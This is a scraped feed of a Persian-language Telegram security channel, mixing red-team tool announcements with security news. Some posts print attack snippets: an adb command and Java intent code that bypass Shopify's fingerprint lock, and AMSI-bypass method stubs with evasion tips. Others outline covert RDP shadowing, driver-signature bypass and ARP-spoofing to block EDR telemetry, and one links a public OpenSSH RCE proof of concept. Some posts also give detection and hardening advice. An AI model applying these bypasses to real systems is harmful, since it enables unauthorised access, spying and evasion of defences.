Security Analysis – Telegram
Security Analysis
@securation
11.5K subscribers
344 photos
50 videos
36 files
885 links
- Offensive Security (Red Teaming / PenTesting)
- BlueTeam (OperationSec, TreatHunting, DFIR)
- Reverse Engineering / Malware Analysis
- Web Security
- Cryptography
- Steganography
- Forensics
Contact : @DrPwner
Download Telegram
About
Blog
Apps
Platform
Join
Security Analysis
11.5K subscribers
Security Analysis
⭕️پروژه پایتونی توسعه داده شده است که به جهت ایجاد Socks Proxy با IP Source های به صورت رندوم، با استفاده از تکنیک Round Robin، به صورت SSH Tunnels یا حالت های دیگر مورد استفاده است.
از مواردی که در آن مفید هست این ابزار، میتوان به WAF Bypass، Password Spraying ، Web scraping اشاره نمود.
توضیحات تکمیلی درباره عملکرد این ابزار:
TREVORproxy has two modes of operation: a Subnet Proxy and an SSH Proxy:

Subnet Proxy mode uses the AnyIP feature of the Linux kernel to assign an entire subnet to your network interface, and give every connection a random source IP address from that subnet.
E.g. if your cloud provider gives you a /64 IPv6 range, you can send your traffic from over eighteen quintillion (18,446,744,073,709,551,616) unique IP addresses.
SSH Proxy mode combines iptables with SSH's SOCKS proxy feature (ssh -D) to round-robin packets through remote systems (cloud VMs, etc.)

NOTE: TREVORproxy is not intended as a DoS tool, as it does not "spoof" packets. It is a fully-functioning SOCKS proxy, meaning that it is designed to accept return traffic.

#RedTeam #OpSec
@securation
GitHub
GitHub - blacklanternsecurity/TREVORproxy: A SOCKS proxy written in Python that randomizes your source IP address. Round-robin…
A SOCKS proxy written in Python that randomizes your source IP address. Round-robin your evil packets through SSH tunnels or give them billions of unique source addresses! - blacklanternsecurity/TR...
6.49K views
Security Analysis
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️Bypass of biometrics security functionality (FingerPrint) of Shopify using DeepLink

Exploit using ADB:
adb shell am start -n com.shopify.mobile/com.shopify.mobile.lib.app.DeepLinkActivity -d 'https://www.shopify.com/admin/products'

Exploit using Java Code:
Intent intent = new Intent();
intent.setClassName("com.shopify.mobile", "com.shopify.mobile.lib.app.DeepLinkActivity");
intent.setData(Uri.parse("https://www.shopify.com/admin/products")); 
startActivity(intent);

https://hackerone.com/reports/637194

#Android
@Securation
5.82K views
Security Analysis
⭕️ یکی از ویژگی هایی که توی مراحل RedTeam به کار میاد و شاید کمتر کسی بهش بربخوره اینشکلی هست که ، فرض کنید سیستم ها ویژگی RDP بر روی آنها فعال است، اما پورت مربوط به آن توسط فایروال مسدود باشد و پورت SMB یعنی 445 در دسترس باشد ، با استفاده از RDP Shadow این امکان را داریم از این طریق به هدف دسترسی RDP داشته باشیم به طوری که فرد متوجه نشود.
با پرداختن به این مقاله ، تکنیک های Persistence و Backdoor با این روش و تکنیک های OpSec مورد استفاده در آن را متوجه میشویم.
در آخر برای شناسایی این تکنیک میتوان مشخص کرد اگر مقدار Shadow در کلید:
HKLM\Software\Policies\Microsoft\Windows NT\Terminal Services

ایجاد یا تغییر کرد هشدار داده شود.
همچنین برای امن سازی آن میتوان به موارد زیر اشاره نمود:
To prevent shadowing altogether, using application whitelisting, it is possible to block the RdpSaUacHelper.exe, RdpSaProxy.exe and RdpSa.exe processes from launching
In the group policy, one can explicitly set the Shadow setting to require the user’s consent before shadowing or controlling the session so the backdoor is less effective; this assumes that an attacker at a later moment does not have sufficient privileges anymore to set the Shadow key in the registry to the value of their liking
The WINSTATION_SHADOW permission can be removed from all entries in the Win32_TSAccount WMI class, although an attacker with administrative permissions can provide themselves this permission again

#RedTeam #RDP
@securation
BITSADMIN Blog
Spying on users using Remote Desktop Shadowing - Living off the Land
How to spy on users on remote computers making only use of Windows' built-in functionality? This post will explain the steps to (ab)use Windows' Remote Desktop feature to view a remote user's desktop using native Windows functionality without them noticing…
7.2K views
Security Analysis
⭕️ آسیب پذیری جدید به نام regreSSHion روی OpenSSH کشف شده که به هکرها اجازه اجرای کد از راه دور را میدهد.
شماره CVE ثبت شده CVE-2024-6387 که تحلیل این آسیب پذیری رو میتونید اینجا بخونید.
در ایران بالای 85 هزار سرور آسیب پذیر به این آسیب پذیری RCE وجود داره لطفا اطلاع رسانی کنید.

https://www.qualys.com/regresshion-cve-2024-6387/

Poc : https://github.com/zgzhang/cve-2024-6387-poc/blob/main/7etsuo-regreSSHion.c

@securation
8.82K views
Security Analysis
⭕️ اگر عمیق تر به معماری امنیتی و احراز هویت در سرویس مایکروسافت رجوع کرده باشید متوجه خواهید شد که مسئولیت تمامی احراز هویت ها و تعامل آن ها با هم با SSPI یا Security Support Provider Interface است.
این معماری که به طوری نوعی از WinApi ها هم است، در دو سطح User-Mode و Kernel-Mode است، در سطح کرنل از درایوری به اسم KSecDD.sys استفاده میشود.
با بررسی بیشتر متوجه میشویم عملیات IOCTL_KSEC_IPC_SET_FUNCTION_RETURN در KSSPI دسترسی lSASS به اجرای دستور به صورت دلخواه در آدرس های سطح کرنل ایجاد میکند.
همچنین باید اشاره کرد با شروع فرایند lsass.exe!LsapOpenKsec پروسه LSASS را فراخوانی میکند و با استفاده از عملیات IOCTL_KSEC_CONNECT_LSA خود را به این رابط متصل می کند.
از این نقطه به بعد، هیچ فرآیند دیگری نمی تواند به اینترفیس متصل شود و بنابراین منطقا فقط توسط LSASS راه اندازی می شود.
حال با این توضیحات ما دسترسی آن را داریم که ویژگی Driver Signature Enforcement را غیر فعال کنیم و Unsigned kernel drivers های خود را بدون مشکل Load کنیم.
https://tierzerosecurity.co.nz/2024/04/29/kexecdd.html
#RedTeam #RootKit #Evasion
@securation
Docs
Security Support Provider Interface Architecture
Learn about the Windows authentication protocols that are used within the Security Support Provider Interface (SSPI) architecture.
5.76K views
Security Analysis
Forwarded from کانال بایت امن
#DWORD #CPL1

📣 ثبت نام دوره دوم آموزش زبان برنامه نویسی C | سطح مقدماتی و متوسط
◀️با محوریت مهندسی معکوس و برنامه نویسی امن

✈️مشخصات دوره :
⬅️سطح دوره : مقدماتی و متوسط
⬅️تعداد ساعت دوره : 25 ساعت
⬅️نحوه برگزاری : آفلاین ( ویدیو های رکورد شده + پلیر اختصاصی )
⬅️زبان دوره : فارسی و انگلیسی
⬅️تعداد سر فصل : 25
⬅️ارزیابی و مدرک پایان دوره : دارد
⬅️گروه پشتیبانی : دارد

✈️نکات کلیدی دوره :
⬅️آموزش پیشنیاز های لازم و مفاهیم برنامه نویسی
⬅️شامل استاندارد های ANSI C تا C17
⬅️کد نویسی در محیط های برنامه نویسی Visual Studio و Visual Studio Code
⬅️کد نویسی در سیستم عامل های ویندوز و لینوکس
⬅️ساخت برنامه های Cross-Platform
⬅️کار با ابزار های CMake و Automake
⬅️آموزش به صورت پروژه محور و بررسی خلاصه محتوای هر بخش در پایان آن
⬅️حل سوالات مربوط به مصاحبه های کاری و  مرور کردن مطالب در انتهای دوره
⬅️جلسات آنلاین رفع اشکال و پرسش و پاسخ
⬅️مناسب برای تمامی گرایش های نیازمند به زبان برنامه نویسی C

◀️در این دوره فرض بر این گرفته شده که زبان C به عنوان اولین زبانی است که قصد یادگیری آن را دارید. به همین دلیل، تمامی پیش‌نیازها به طور کامل توضیح داده شده‌اند و تمامی بخش‌ها به ریز و با نکات کاربردی بیان شده‌اند.

در هر مرحله از دوره، مفاهیم با جزئیات توضیح داده شده و با مثال‌های عملی و تمرین‌های متنوع پشتیبانی می‌شوند تا یادگیری به بهترین شکل ممکن انجام شود. هدف این است که شما بتوانید با اعتماد به نفس و درک عمیق، برنامه‌نویسی به زبان C را آغاز کنید.

🎁 طبق روال همیشگی، دانشجویان سایر دوره های آکادمی DWORD از تخفیف برخوردار خواهند بود.
🎁 در صورت تمایل به شرکت در دوره و پرداخت شهریه به صورت اقساط با مدرس دوره در ارتباط باشید.


✈️ مشاهده اطلاعات کامل دوره، سرفصل و ثبت نام
🎤 ارتباط با مدرس دوره
▶️ پلی لیست ویدیو های دمو دوره

🦅 کانال بایت امن | گروه بایت امن
_
Please open Telegram to view this post
VIEW IN TELEGRAM
4.02K views
Security Analysis
⭕️ در سال 2016 محققی به اسم Matt Greabers تکنیکی برای دور زدن AMSI ایجاد کرد به اسم Reflection، زمانی که این تکنیک را با Method Swapping ترکیب کنیم اصطلاحا MonkeyPatching نیز گفته میشود.
حال به توضیح قسمتی از این تکنیک اشاره میکنیم:

There is a low detection surface:
statically: because the code profile is so short and it is hard to apply a signature on any part of the common .NET functionality used
dynmically: because of the lack of hooked win32 API calls
Because we are modifying JIT/IL memory which is hard for AV/EDR to monitor or has not been monitored at this point by a lot of vendors
! For some security products, modify method M to pass in empty argument string c.
! For CSHARP example, private static int M(string c, string s) { c = ""; return 1; }
! For POWERSHELL example, class TrollAMSI{static [int] M([string]$c, [string]$s){ $c = ""; return 1}}
! Refer to TrollAMSIdotnet for amsi bypass for Assembly.Load()
Benefits
No P/Invoke or win32 API calls used such as VirtualProtect hence more opsec safe
No amsi.dll patching or byte patching for that matter


‏در ادامه نکاتی را برای رعایت OpSec میتوان اشاره کرد:

STATIC: obfuscate "AmsiUtils" and "ScanContent" maybe?
DYNAMIC: Nothing much really. Note that Add-Type method will leave disk artifacts, whereas hosting the compiled DLL on a webserver and using Load() is completely in memory


https://github.com/cybersectroll/TrollAMSI/tree/main
#RedTeam #AMSI
@securation
GitHub
GitHub - cybersectroll/TrollAMSI
Contribute to cybersectroll/TrollAMSI development by creating an account on GitHub.
5.41K views
Security Analysis
⭕️ اسکریپتی به جهت مانیتور کردن تغییرات Active Directory به صورت RealTime بدون دریافت تمام Object ها توسعه داده شده که،
از Replication Metadata ها و Update Sequence Number یا USN برای فیلتر کردن Object ها استفاده میکند.
این پروژه برگرفته از LDAP Monitor است.
به سوییچ های این ابزار و نحوه استفاده از آن میپردازیم:
Parameters
DC - domain controller FQDN.
Formatlist - output in list instead of table.
ExcludelastLogonTimestamp - exclude lastLogonTimestamp events from output
DumpAllObjects - dump all active directory before start. In case of changes It will show you all previous values. But in large domains use it on your own risk (time and resource consuming).
Short - in output will be only AttributeName, AttributeValue, LastOriginChangeTime and Explanation.
Output - create XML file with all output.
ExcludeObjectGUID - exclude Active Directory object with specific GUID.
Sleep - time interval between requests for USN number. By default - 30 seconds.
USN - specify started USN.
DisplayXML - display previous captured XML file.

How to use
Domain computer
Just run module in powershell session from domain user. For better performance use domain controller FQDN instead of IP address.

Non-domain computer
Start powershell session with domain user with runas. Check that domain controller accessible. For better performance use domain controller FQDN instead of IP address.

#RedTeam #BlueTeam
@securation
GitHub
GitHub - DrunkF0x/ADSpider: Monitor changes in Active Directory with replication metadata
Monitor changes in Active Directory with replication metadata - DrunkF0x/ADSpider
6.62K views
Security Analysis
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Android Malware with Fake Extension(PDF) in Whatsapp

در این حمله نفوذگر توسط دستکاری کردن و تغییر نام اکستنشن نمایشی در صفحه چت واتساپ اهداف خود، بدافزار اندرویدی با فرمت apk را با اکستنشن نمایشی pdf در واتساپ برای قربانیان خود ارسال کرده و قربانیان با فرض بر pdf بودن فایل ارسالی، بدافزار را نصب کرده و دیوایس شان آلوده میگردد.

#Android #Malware
@Securation
5.91K views
Security Analysis
⭕️ پلیس فدرال آمریکا با کمک جعبه نرم افزار Cellebrite تونست به دستگاه موبایل شخصی که به ترامپ شلیک کرد قفل موبایل رو باز کنه و به اطلاعاتش دست پیدا کنه.
تیم حرفه ای که اینو نوشته میاد روی سیستم عامل های موبایل آسیب پذیری های 0day کشف میکنه و بجای گزارش دادن به اپل و گوگل و غیره ، اکسپلویت واسشون مینویسه و به نرم افزار خودشون اضافه میکنه، ممکنه آسیب پذیریها شامل دور زدن احراز هویت ها باشه یا حتی RCE هایی که بصورت لوکال روی موبایل کار میکنند.
چون با وصل کردن USB به موبایل و سیستم راحت اکسپلویت ها رو اجرا میکنند که دور بزنه و لاگین کنه، یا حتی گاها مورد بوده اکسپلویت مستقیم روی کرنل تاثیر داشته و از حافظه ی موبایل یک Dump گرفته و بعد تحلیل تمام مواردی که توی فارنزیک نیاز دارند رو بدست میاره.
نرم افزار مورد نظر جهت فارنزیک موبایل به کار برده میشه ولی استفاده هایی که از اکسپلویت ها میشه نمونه هایی داشته که این شرکت مستقیم با اسراییلی ها مرتبط هست و حتی با گروه NSO هم قبلا شایعه شده بود وصل هستن که توی گوگل پلی بدافزار پخش کرده بود.
@securation
8.72K viewsedited  
Security Analysis
⭕️ اسناد لو رفته جدید Cellebrite نشان می دهد که این نرم افزار در کدام نسخه اندروید و iOS قادر به باز کردن قفل و دسترسی به داده کاربر است.

https://www.404media.co/leaked-docs-show-what-phones-cellebrite-can-and-cant-unlock/
@securation
5.48K views
Security Analysis
⭕️ APKscan

ابزاری برای اسکن و یافتن API Keys، Tokens، Credentials، Secrets، Endpoints و....

قابلیت ها:
پیدا کردن Secret ها در سورس برنامه
شناسایی مکان های حساس در سورس کد برنامه
شناسایی و یافتن Endpoint ها و توکن ها

https://github.com/LucasFaudman/apkscan
#Android
@Securation
GitHub
GitHub - LucasFaudman/apkscan: Scan for secrets, endpoints, and other sensitive data after decompiling and deobfuscating Android…
Scan for secrets, endpoints, and other sensitive data after decompiling and deobfuscating Android files. (.apk, .xapk, .dex, .jar, .class, .smali, .zip, .aar, .arsc, .aab, .jadx.kts). - LucasFaudma...
5.75K views
Security Analysis
⭕️ اگر با ابزار BloodHound کار کرده باشید میدانید که تعدادی Query به صورت عمومی دارد و مابقی Custom هستند.
از طرفی این پروژه به حالت های مختلف مثل SharpHound هم نوشته شده که از اجزای این ابزار AzureHound است که بصورت اختصاصی برای بررسی ساختار Azure توسعه داده شده است.
حال پروژه ای توسعه داده شده، که تعدادی Query به صورت Custom و هر کدام با هدف خاصی مواردی را در ساختار Azure بررسی میکند.

https://github.com/emiliensocchi/azurehound-queries
#RedTeam #Azure
@securation
5.47K views
Security Analysis
فکت :

https://x.com/1rpwn/status/1814231667478847749?t=aF13aYlWCf8Bk8CLCSPe8Q&s=19

#بورس #باگ_بانتی #مکنا
@securation
6.56K viewsedited  
Security Analysis
دوستان عزیز گروه تبادل دانش امنیت اطلاعات لینکش اینه :
https://news.1rj.ru/str/DarkPwners

لطفا قبل شروع گفتگو یا ارسال مطلب ، قوانین گروه رو مطالعه کنید.
Telegram
Security Analysis Group
گروه تبادل دانش امنیت اطلاعات
14.7K viewsedited  
Security Analysis
⭕️ ابزاری جهت سرعت بخشیدن در فرایند Discovery و Exploit سرویس MSSQL توسعه داده شده که به ویژگی های این ابزار میشه نگاهی کوتاه انداخت :

Performs automatic checks and identifies vulnerabilities
Enables login via Windows Integrated Authentication as well as SQL Authentication
Quickly activates XP_cmdshell if the permission exists (locally as well as on Linked Servers)
Convenient execution of system commands via XP_cmdshell (locally as well as on single/double Linked Servers)
Convenient execution of SQL commands (locally as well as on Linked Servers)
Fast triggering of NTLM requests via XP_dirtree
Custom Stored Procedure - for executing OS commands (locally)
Automatically checks and enables RPC OUT (if RPC OUT is disabled for Linked Servers, stored procedures such as xp_cmdshell on Linked Servers are not usable)
Automatic dumping of MSSQL user hashes

#RedTeam #MSSQL
@securation
GitHub
GitHub - SySS-Research/MAT: This tool, programmed in C#, allows for the fast discovery and exploitation of vulnerabilities in MSSQL…
This tool, programmed in C#, allows for the fast discovery and exploitation of vulnerabilities in MSSQL servers - SySS-Research/MAT
5.6K views
Security Analysis
⭕️ تکنیکی برای دور زدن EDR Telemetry با استفاده از شبکه ارایه شده که میتواند جالب باشد.
در این تکنیک در ابتدا با استفاده حمله ARP Spoofing اقدام به تغییر Gateway میکنیم.
پس از آن با شنود ترافیک و Inspect کردن SNI Packet ها و بررسی SNI سرور های EDR، با فیلتر کردن اطلاعات ارسالی به این سرور ها اقدام به دور زدن این نوع از مکانیزم ها را میکنیم.
مزیت این روش نسبت به مکانیزم های Host-Based این است که نیاز به دسترسی سطح بالاتر نخواهیم داشت.
در ادامه اگر ویدیو ضمیمه شده را مشاهده بکنید با استفاده از این تکنیک تلاش به اجرای Mimikatz میکند.
#RedTeam #EDR #ByPass
@securation
YouTube
ARP Spoofing and Network Filtering to Block EDR Telemetry
A PoC for a network-based EDR telemetry filtering using ARP Spoofing.

1. ARP Spoofing: Perform ARP spoofing against the victim host to make the attacker PC act as the gateway.
2. Traffic Sniffing: Sniff network traffic to intercept TLS Client Hello…
5.82K views
Security Analysis
⭕️ Android Native code obfuscation using O-LLVM(Control Flow Flattening)

Blog Post | o-llvm binary | o-llvm

#Android
#ollvm
#darvincisec
@Securation
5.82K views
Security Analysis
This media is not supported in your browser
VIEW IN TELEGRAM
⭕️ Exploiting the EvilVideo vulnerability on Telegram

یک اکسپلویت زیرودی تلگرام برای اندروید کشف شد که امکان ارسال برنامه‌های مخرب پنهان‌شده به صورت ویدیو در صفحه چت تلگرام قربانی را فراهم می‌کند و با ضربه زدن بر روی ویدیو به جای پخش مدیا، فرایند نصب بدافزار آغاز میشود

📎 Blog Post

#Android
@Securation
9.95K views
Security Analysis
⭕️ قابل توجه کاربران ایرانی که از سرویس دهنده Aeza بدلیل ارزون بودن استفاده هایی مثل راه اندازی VPN میکنند .
گزارش فعالیت های هکرهای روسیه در اروپا نشون میده که در جهت گسترش منافع روسیه بحثهایی که شکل گرفته نشون میده از اسم شرکت Aeza به عنوان یکی از اهرم های اصلی تهیه زیرساخت های هکرهای روس نام برده شده است.
سرویس دهنده ای که بین کاربران ایرانی خیلی پرطرفدار است.
باید مراقب و آگاهی نسبت به ریسک های استفاده از سرورهای این سرویس دهنده رو داشته باشید.
https://correctiv.org/en/fact-checking-en/2024/07/22/inside-doppelganger-how-russia-uses-eu-companies-for-its-propaganda/

#Aeza #VPN #ru
@securation
CORRECTIV
Inside Doppelganger – How Russia uses EU companies for its propaganda
How Doppelganger, one of the biggest Russian disinformation campaigns, is using EU companies to keep spreading its propaganda – despite sanctions.
7.87K viewsedited